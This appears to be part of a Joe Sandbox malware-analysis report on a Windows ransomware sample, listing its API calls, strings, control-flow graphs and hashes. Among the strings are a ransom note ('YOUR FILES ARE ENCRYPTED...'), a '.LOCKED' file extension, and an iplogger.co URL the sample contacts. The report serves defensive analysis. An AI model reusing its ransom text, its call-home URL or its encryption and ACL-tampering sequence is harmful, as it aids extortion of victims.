                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 005C1B1A
                                  • ReadFile.KERNEL32(00000000,?,0000001E,?,00000000), ref: 005C1BB6
                                  • SetFilePointerEx.KERNELBASE(00000000,0000009E,000000FF,00000000,00000002), ref: 005C1BE6
                                  • ReadFile.KERNELBASE(00000000,?,00000038,?,00000000), ref: 005C1BFF
                                  • ReadFile.KERNELBASE(00000000,?,00000014,?,00000000), ref: 005C1C1A
                                  • ReadFile.KERNELBASE(00000000,?,00000016,?,00000000), ref: 005C1C33
                                    • Part of subcall function 005C7054: EnterCriticalSection.KERNEL32(006D9828,00000000,?,?,?,005C1AE6), ref: 005C7071
                                    • Part of subcall function 005C7054: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,?,?,005C1AE6), ref: 005C7085
                                    • Part of subcall function 005C7054: GetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,?,00000000,?,?,?,005C1AE6), ref: 005C70A4
                                    • Part of subcall function 005C7054: SetEntriesInAclW.ADVAPI32(00000001,006D9844,?,005C1AE6,?,?,005C1AE6), ref: 005C70BC
                                    • Part of subcall function 005C7054: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,005C1AE6,00000000,?,?,005C1AE6), ref: 005C70D1
                                    • Part of subcall function 005C7054: LocalFree.KERNEL32(00000000), ref: 005C70EB
                                    • Part of subcall function 005C7054: LocalFree.KERNEL32(00000000), ref: 005C70F6
                                    • Part of subcall function 005C7054: LeaveCriticalSection.KERNEL32(006D9828), ref: 005C70FD
                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000002), ref: 005C1CD4
                                  • SetFilePointerEx.KERNEL32(00000000,FFFFFDA0,000000FF,00000000,00000001), ref: 005C1CE7
                                  • ReadFile.KERNEL32(00000000,?,00000260,?,00000000), ref: 005C1D03
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C1DFE
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C1E1B
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C1E71
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00020000,00000000,00000000,?,00020000,00000000), ref: 005C1EFF
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,?,00000000,00000000,?,00020000,00000000,00000000,?,?,00000000,?), ref: 005C1F24
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005C1FDB
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 005C20D1
                                  • ReadFile.KERNEL32(?,?,00020000,00000000,00000000), ref: 005C20EB
                                  • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001), ref: 005C2118
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005C212D
                                  • CloseHandle.KERNEL32(?), ref: 005C21DA
                                  • lstrcmpW.KERNEL32(?,?), ref: 005C2200
                                  • MoveFileW.KERNEL32(?,?), ref: 005C220E
                                  • lstrcpyW.KERNEL32(?,?), ref: 005C2224
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000064,00000000), ref: 005C226D
                                  • ReadFile.KERNEL32(?,?,00020000,?,00000000), ref: 005C22A1
                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000001), ref: 005C22DD
                                  • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 005C22F2
                                  • SetFilePointerEx.KERNEL32(?,00020000,00000000,00000000,00000001), ref: 005C2314
                                  • lstrcpyW.KERNEL32(?,?), ref: 005C2352
                                  • lstrcatW.KERNEL32(?,.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED), ref: 005C2360
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 005C2705
                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 005C271D
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 005C2730
                                  • WriteFile.KERNEL32(?,?,0000001E,?,00000000), ref: 005C274B
                                  • WriteFile.KERNEL32(?,README.TXT,?,00000000), ref: 005C2761
                                  • WriteFile.KERNEL32(?,YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke,?,00000000), ref: 005C2777
                                  • WriteFile.KERNEL32(?,?,0000001E,?,00000000), ref: 005C278C
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005C27A2
                                  • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 005C27B7
                                  • WriteFile.KERNEL32(?,?,00000010,?,00000000), ref: 005C27CC
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000002), ref: 005C27E7
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005C27FC
                                  • WriteFile.KERNEL32(?,?,00000260,?,?), ref: 005C2830
                                  • WriteFile.KERNEL32(?,?,0000002E,?,00000000), ref: 005C2845
                                  • WriteFile.KERNEL32(?,README.TXT,?,00000000), ref: 005C285B
                                  • WriteFile.KERNEL32(?,?,0000002E,?,00000000), ref: 005C2870
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 005C2886
                                  • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 005C289B
                                  • WriteFile.KERNEL32(?,?,00000010,?,00000000), ref: 005C28B0
                                  • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 005C28C5
                                  • WriteFile.KERNEL32(?,?,00000014,?,00000000), ref: 005C28DC
                                  • WriteFile.KERNEL32(?,?,00000016,?,00000000), ref: 005C28F1
                                  • lstrcatW.KERNEL32(?,?), ref: 005C298B
                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000002), ref: 005C29AC
                                  • WriteFile.KERNEL32(?,?,00000260,?,00000000), ref: 005C29C8
                                  • lstrcatW.KERNEL32(?,README.TXT), ref: 005C2A0D
                                  Strings
                                  • fkW, xrefs: 005C23AB
                                  • .{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED, xrefs: 005C2358
                                  • U, xrefs: 005C28F3
                                  • README.TXT, xrefs: 005C275B, 005C2855
                                  • README.TXT, xrefs: 005C2A00
                                  • YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke, xrefs: 005C2771, 005C2A28
                                  • ,, xrefs: 005C25E4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: File$Write$Pointer$Read$Unothrow_t@std@@@__ehfuncinfo$??2@$AttributesInfoNamedSecuritylstrcat$ByteCharCreateCriticalFreeLocalMultiSectionWidelstrcpy$CloseEnterEntriesErrorHandleLastLeaveMoveSizelstrcmp
                                  • String ID: ,$.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED$README.TXT$README.TXT$U$YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke$fkW
                                  • API String ID: 4009839642-3689400687
                                  • Opcode ID: 0dd1534bd91df801ddb0392f35748e6d6440f6498357abbb74689d20d0d2c247
                                  • Instruction ID: 3521cad0f114633585c8764909ec07dde0754ac4b9339947577886bbe115f99a
                                  • Opcode Fuzzy Hash: 0dd1534bd91df801ddb0392f35748e6d6440f6498357abbb74689d20d0d2c247
                                  • Instruction Fuzzy Hash: 03A28DB1608341AFE324CF64CC45FABBBE9FBC9710F104A2EF595D6291E77099408B66
                                  Function 005CAF2D Relevance: 107.0, APIs: 11, Strings: 50, Instructions: 230stringnetworkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 747 5caf2d-5caf46 748 5caf4c-5caf5b lstrlenA 747->748 749 5cb217-5cb21a 747->749 750 5cb216 748->750 751 5caf61-5caf73 InternetOpenW 748->751 750->749 751->750 752 5caf79-5cafe8 MultiByteToWideChar 751->752 753 5cafea-5caff3 752->753 753->753 754 5caff5-5cb04e lstrcpyW lstrcatW 753->754 755 5cb051-5cb064 754->755 755->755 756 5cb066-5cb0a9 lstrcatW lstrlenW InternetOpenUrlW 755->756 757 5cb0af-5cb0c8 InternetReadFile 756->757 758 5cb213-5cb214 InternetCloseHandle 756->758 759 5cb0ca-5cb0ce 757->759 760 5cb0d0-5cb17b InternetCloseHandle 757->760 758->750 759->757 759->760 761 5cb17f-5cb190 760->761 761->761 762 5cb192-5cb1de 761->762 763 5cb1e2-5cb1f3 762->763 763->763 764 5cb1f5-5cb20b call 5d1c06 763->764 766 5cb210 764->766 766->758
                                  APIs
                                  • lstrlenA.KERNEL32(https://iplogger.co/155qJ4.torrent,75920F00,00000000,00000000), ref: 005CAF53
                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005CAF69
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,https://iplogger.co/155qJ4.torrent,000000FF,?,00000023), ref: 005CAF8F
                                  • lstrcpyW.KERNEL32(?,00000007), ref: 005CB000
                                  • lstrcatW.KERNEL32(?), ref: 005CB014
                                  • lstrcatW.KERNEL32(?,?), ref: 005CB074
                                  • lstrlenW.KERNEL32(?,80000000,00000000), ref: 005CB083
                                  • InternetOpenUrlW.WININET(00000000,?,?,00000000), ref: 005CB099
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 005CB0C0
                                  • InternetCloseHandle.WININET(00000000), ref: 005CB0D1
                                  • InternetCloseHandle.WININET(00000000), ref: 005CB214
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Internet$CloseHandleOpenlstrcatlstrlen$ByteCharFileMultiReadWidelstrcpy
                                  • String ID: '$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$<$A$B$D$H$N$S$T$T$Y$https://iplogger.co/155qJ4.torrent$i$k$l$l$l$m$p$q$r$u$u$u$y$y$z${$}
                                  • API String ID: 3849917680-1331855335
                                  • Opcode ID: 63e5073d59fe923297169fde57ebf68cc4185695b1d4abaea4002ce87ee49fbc
                                  • Instruction ID: a34dab675d08bc6437419a5d8bc734c3a08410a5681239dd2b774955f05736d1
                                  • Opcode Fuzzy Hash: 63e5073d59fe923297169fde57ebf68cc4185695b1d4abaea4002ce87ee49fbc
                                  • Instruction Fuzzy Hash: 91B1B920D0C2CCDDEB12CBE8D848BDEBFB55F26308F085199D4947B682C6BA5649C776
                                  Function 005C55DF Relevance: 100.2, APIs: 13, Strings: 44, Instructions: 407windowsleepsynchronizationCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 767 5c55df-5c572d GetProcessHeap call 5cabd1 call 5caeb5 call 5c8e2e MultiByteToWideChar call 5c4369 call 5c7413 call 5c1689 call 5c6cb5 call 5ca0b9 call 5c7109 call 5c87dd WSAStartup GetComputerNameW InitializeCriticalSection call 5cecd9 790 5c5731-5c5743 767->790 790->790 791 5c5745-5c57f9 790->791 792 5c57fd-5c5811 791->792 792->792 793 5c5813-5c5840 call 5d1c06 call 5ca7db 792->793 798 5c58da-5c58e7 call 5c9519 793->798 799 5c5846-5c584c 793->799 804 5c58ed-5c58f3 798->804 805 5c59cf-5c59d6 call 5c6c35 798->805 799->798 801 5c5852-5c585d call 5c73f4 799->801 801->798 810 5c585f-5c58ad 801->810 807 5c590e-5c5914 804->807 808 5c58f5-5c5900 call 5c73f4 804->808 816 5c59d8-5c59e3 call 5c73f4 805->816 817 5c59e9-5c59ef 805->817 807->805 813 5c591a-5c5920 807->813 808->807 822 5c5902-5c5909 call 5c19fb call 5c9585 808->822 814 5c58af-5c58b8 810->814 818 5c593b-5c5941 813->818 819 5c5922-5c592d call 5c73f4 813->819 814->814 820 5c58ba-5c58d1 CreateMutexA WaitForSingleObject 814->820 816->817 837 5c5b65-5c5b6b 816->837 824 5c59f5-5c5a8d call 5c5c09 call 5c19fb call 5caf2d 817->824 825 5c5a92-5c5aa9 call 5c8c94 call 5c8d5c call 5c6c35 817->825 818->805 821 5c5947-5c5952 call 5c73f4 818->821 819->818 839 5c592f-5c5936 call 5c19fb call 5c9abb 819->839 820->798 827 5c58d3-5c58d4 ExitProcess 820->827 821->805 845 5c5954-5c595a 821->845 822->807 824->825 869 5c5abc-5c5abe 825->869 842 5c5b6d-5c5b74 call 5d1b3f 837->842 843 5c5b76-5c5b8a 837->843 839->818 842->843 860 5c5bb9-5c5be5 call 5c7172 call 5c7ccb call 5c1a01 call 5c6f36 call 5ca624 call 5c8c37 call 5c6a4a call 5d1a8a 842->860 851 5c5ba8-5c5bb7 GetMessageW 843->851 852 5c595c call 5cc338 845->852 853 5c5961-5c5967 845->853 859 5c5b8c-5c5ba2 TranslateMessage DispatchMessageW 851->859 851->860 852->853 861 5c5969-5c5970 call 5c9ebc 853->861 862 5c5980-5c5986 853->862 859->851 861->862 877 5c5972-5c5979 call 5c9e62 861->877 863 5c599d-5c59a3 862->863 864 5c5988 call 5cb21b 862->864 870 5c59aa-5c59b0 863->870 871 5c59a5 call 5cb8a2 863->871 874 5c598d-5c5994 call 5c9e62 864->874 878 5c5aab-5c5ab7 call 5c9f0e Sleep call 5c6c35 869->878 879 5c5ac0-5c5aff call 5c5bfa call 5c7183 869->879 880 5c59bb-5c59c1 870->880 881 5c59b2-5c59b6 call 5ca715 870->881 871->870 874->863 899 5c5996-5c5998 call 5cb87a 874->899 877->862 896 5c597b call 5cbb5f 877->896 878->869 907 5c5b0d-5c5b14 call 5c8dbb 879->907 880->805 884 5c59c3 call 5c6a84 880->884 881->880 898 5c59c8-5c59ca call 5c6bf0 884->898 896->862 898->805 899->863 913 5c5b16-5c5b1c 907->913 914 5c5b01-5c5b0b call 5c9f0e Sleep 907->914 917 5c5b1e-5c5b5b call 5c5beb call 5c19fb call 5caf2d 913->917 918 5c5b60 call 5ca63c 913->918 914->907 917->918 918->837
                                  APIs
                                  • GetProcessHeap.KERNEL32 ref: 005C55EE
                                    • Part of subcall function 005CABD1: GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000003), ref: 005CABE6
                                    • Part of subcall function 005CAEB5: GetSystemDefaultUILanguage.KERNEL32 ref: 005CAF09
                                    • Part of subcall function 005C8E2E: StrStrA.SHLWAPI(006D2040,?), ref: 005C8EFA
                                    • Part of subcall function 005C8E2E: GetCommandLineW.KERNEL32(?), ref: 005C8F3C
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,README.TXT,000000FF,README.TXT,0000000B), ref: 005C561F
                                    • Part of subcall function 005C7413: CryptAcquireContextA.ADVAPI32(006D9868,00000000,00000005,00000018,F0000000,?,00000000), ref: 005C751E
                                    • Part of subcall function 005C6CB5: GetComputerNameW.KERNEL32(?,?), ref: 005C6DCF
                                    • Part of subcall function 005CA0B9: LoadLibraryA.KERNEL32(NV\,?,00000000), ref: 005CA167
                                    • Part of subcall function 005CA0B9: GetProcAddress.KERNEL32(00000000), ref: 005CA1D4
                                    • Part of subcall function 005C7109: InitializeCriticalSection.KERNEL32(?,?,005C5657), ref: 005C710D
                                    • Part of subcall function 005C7109: EnterCriticalSection.KERNEL32(?,?,005C5657), ref: 005C7114
                                    • Part of subcall function 005C7109: LeaveCriticalSection.KERNEL32(?,?,005C5657), ref: 005C7124
                                    • Part of subcall function 005C87DD: InitializeCriticalSection.KERNEL32(006D9898,?,?,00000000), ref: 005C883F
                                    • Part of subcall function 005C87DD: lstrcpyW.KERNEL32(success,00000074,?,?,00000000), ref: 005C88B7
                                    • Part of subcall function 005C87DD: lstrcpyW.KERNEL32(out of memory,2](])]}]2];]}]0]8]0]2]/]$]],?,?,00000000), ref: 005C8971
                                  • WSAStartup.WS2_32(00000202,006D9688), ref: 005C5673
                                  • GetComputerNameW.KERNEL32(992547,?), ref: 005C568B
                                  • InitializeCriticalSection.KERNEL32(006D95CC), ref: 005C5696
                                    • Part of subcall function 005CECD9: #17.COMCTL32(?,?,00000000), ref: 005CECF7
                                    • Part of subcall function 005CECD9: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 005CECFF
                                    • Part of subcall function 005CECD9: lstrcpyW.KERNEL32(BEAST CLASS,00000000,?,?,00000000), ref: 005CEDCF
                                    • Part of subcall function 005CECD9: lstrcpyW.KERNEL32(Beast,00000000,?,?,00000000), ref: 005CEE9C
                                  • CreateMutexA.KERNEL32(00000000,00000001,?,00000000), ref: 005C58C2
                                  • WaitForSingleObject.KERNEL32(00000000), ref: 005C58C9
                                  • ExitProcess.KERNEL32 ref: 005C58D4
                                  • Sleep.KERNEL32(000003E8), ref: 005C5AB5
                                  • Sleep.KERNEL32(000003E8), ref: 005C5B0B
                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005C5BB3
                                    • Part of subcall function 005C73F4: EnterCriticalSection.KERNEL32(006D99FC,006D9874,006D9A1C,005C85A2), ref: 005C73F9
                                    • Part of subcall function 005C73F4: LeaveCriticalSection.KERNEL32(006D99FC), ref: 005C7408
                                  • TranslateMessage.USER32(?), ref: 005C5B94
                                  • DispatchMessageW.USER32(?), ref: 005C5BA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$lstrcpy$InitializeMessage$ComputerEnterLeaveNameProcessSleep$AcquireAddressByteCharCommandContextCreateCryptDefaultDispatchExitHandleHeapInfoLanguageLibraryLineLoadLocaleModuleMultiMutexObjectProcSingleStartupSystemTranslateWaitWide
                                  • String ID: -$2$391467B9-BD4E-2B74-71A6-03A3DA3DE322$7$992547$@$@$@$@$D$F$G$H$K$K$L$L$O$O$O$P$Q$README.TXT$README.TXT$YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke$[$\$]$^$^$a$~$~$~$~$~$~$~$~$~$~$~$~$~
                                  • API String ID: 3743700861-4111966801
                                  • Opcode ID: 3e6b85568d75ddda02adbf027140fbf37a164477f808d3bc3aeaeb7bbdd14d0d
                                  • Instruction ID: a9ddee7118e88f1a4891528b982a57be9096b37509d9c60f2ae3a1dacc8d21c4
                                  • Opcode Fuzzy Hash: 3e6b85568d75ddda02adbf027140fbf37a164477f808d3bc3aeaeb7bbdd14d0d
                                  • Instruction Fuzzy Hash: 2DF1576010D7C29ED721EBF88489B9BBFE46FA6308F08089DF1D547243DA659A49C727
                                  Function 005CA0B9 Relevance: 77.3, APIs: 10, Strings: 34, Instructions: 302libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 930 5ca0b9-5ca148 931 5ca14b-5ca15e 930->931 931->931 932 5ca160-5ca174 LoadLibraryA 931->932 933 5ca488-5ca48b 932->933 934 5ca17a-5ca1b8 932->934 935 5ca1ba-5ca1c2 934->935 935->935 936 5ca1c4-5ca233 GetProcAddress 935->936 937 5ca236-5ca247 936->937 937->937 938 5ca249-5ca287 GetProcAddress 937->938 939 5ca289-5ca292 938->939 939->939 940 5ca294-5ca327 GetProcAddress 939->940 941 5ca32a-5ca33d 940->941 941->941 942 5ca33f-5ca387 GetProcAddress 941->942 943 5ca38a-5ca39b 942->943 943->943 944 5ca39d-5ca3b7 GetProcAddress 943->944 945 5ca3bd-5ca3c3 944->945 946 5ca476-5ca482 FreeLibrary 944->946 945->946 947 5ca3c9-5ca3cf 945->947 946->933 947->946 948 5ca3d5-5ca3db 947->948 948->946 949 5ca3e1-5ca3e3 948->949 949->946 950 5ca3e9-5ca452 GetCurrentProcess GetProcessId 949->950 951 5ca455-5ca45e 950->951 951->951 952 5ca460-5ca474 GetEnvironmentVariableW 951->952 952->933
                                  APIs
                                  • LoadLibraryA.KERNEL32(NV\,?,00000000), ref: 005CA167
                                  • GetProcAddress.KERNEL32(00000000), ref: 005CA1D4
                                  • GetProcAddress.KERNEL32(0000000C), ref: 005CA256
                                  • GetProcAddress.KERNEL32(00000006), ref: 005CA29E
                                  • GetProcAddress.KERNEL32(?), ref: 005CA34C
                                  • GetProcAddress.KERNEL32(wHvMPQAJRK), ref: 005CA3AA
                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 005CA3E9
                                  • GetProcessId.KERNEL32(00000000,?,00000000), ref: 005CA3F0
                                  • GetEnvironmentVariableW.KERNEL32(00000004,C:\Windows,00000400,?,00000000), ref: 005CA46E
                                  • FreeLibrary.KERNEL32(?,00000000), ref: 005CA47C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: AddressProc$LibraryProcess$CurrentEnvironmentFreeLoadVariable
                                  • String ID: %wPR$*$+$,$,$-$-$-$1$3$7$9$;$;$;$;$=$C:\Windows$I$NV\$Q$S$S$SnTubsuTfttjpo$V$W$W$X$X$XsMkzRoyz$]$^$wHvMPQAJRK$wNV\
                                  • API String ID: 1955238616-3862059220
                                  • Opcode ID: deb27177bac14a0e2318712c669254c5b8894e9c13eeca907b1fb4a1b97044b8
                                  • Instruction ID: a0afd5a56f220d64f34465655fd0d0748ce0c3ec50745f05b5b93e553e6331c7
                                  • Opcode Fuzzy Hash: deb27177bac14a0e2318712c669254c5b8894e9c13eeca907b1fb4a1b97044b8
                                  • Instruction Fuzzy Hash: F2E10060D092CCDEDF12CBF895887DEBFB15F26308F18509AD5947B243C2B9460ADB26
                                  Function 005C6CB5 Relevance: 63.2, APIs: 10, Strings: 26, Instructions: 184stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1003 5c6cb5-5c6cc8 1004 5c6cce-5c6d9a 1003->1004 1005 5c6f31-5c6f35 1003->1005 1006 5c6d9c-5c6da5 1004->1006 1006->1006 1007 5c6da7-5c6db6 call 5c6c41 1006->1007 1007->1005 1010 5c6dbc-5c6dd7 GetComputerNameW 1007->1010 1010->1005 1011 5c6ddd-5c6df5 1010->1011 1012 5c6df8-5c6e09 1011->1012 1012->1012 1013 5c6e0b-5c6e45 lstrcatW lstrlenW GetUserNameW 1012->1013 1013->1005 1014 5c6e4b-5c6e59 call 5c5c2d 1013->1014 1014->1005 1017 5c6e5f-5c6e89 LookupAccountNameW 1014->1017 1018 5c6f1c-5c6f24 1017->1018 1019 5c6e8f-5c6e9c InitializeSecurityDescriptor 1017->1019 1018->1005 1021 5c6f26-5c6f2b call 5c5cd2 1018->1021 1019->1018 1020 5c6e9e-5c6ead SetSecurityDescriptorDacl 1019->1020 1020->1018 1022 5c6eaf-5c6ec2 SetSecurityDescriptorOwner 1020->1022 1021->1005 1022->1018 1024 5c6ec4-5c6ec7 1022->1024 1026 5c6ecc-5c6ed2 1024->1026 1026->1026 1027 5c6ed4-5c6f1a BuildTrusteeWithSidW InitializeCriticalSection 1026->1027 1027->1005
                                  APIs
                                  • GetComputerNameW.KERNEL32(?,?), ref: 005C6DCF
                                  • lstrcatW.KERNEL32(?,1mm,?,?,00000000), ref: 005C6E19
                                  • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 005C6E2D
                                  • GetUserNameW.ADVAPI32(00000000), ref: 005C6E3D
                                  • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,?,?,?), ref: 005C6E81
                                  • InitializeSecurityDescriptor.ADVAPI32(?,00000001,?,?,00000000), ref: 005C6E94
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,00000000), ref: 005C6EA5
                                  • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,?,00000000), ref: 005C6EBA
                                  • BuildTrusteeWithSidW.ADVAPI32(006D9850,?,?,00000000), ref: 005C6EDF
                                  • InitializeCriticalSection.KERNEL32(006D9828,?,?,00000000), ref: 005C6F14
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: DescriptorNameSecurity$Initialize$AccountBuildComputerCriticalDaclLookupOwnerSectionTrusteeUserWithlstrcatlstrlen
                                  • String ID: 1mm$T$U$X$Y$f$j$j$j$j$j$l$m$m$n$n$n$p$q$s$u$w$w$x${$|
                                  • API String ID: 531847068-720051323
                                  • Opcode ID: 323a7a6217906f4f7bf4e60a01e1b3e32ae939bad52f43dd7c210a9587ef6c60
                                  • Instruction ID: fb6066357a252f8c4e341b82677ca7317cb5eba7e9cf7d6e4f9d7a6dafd06e80
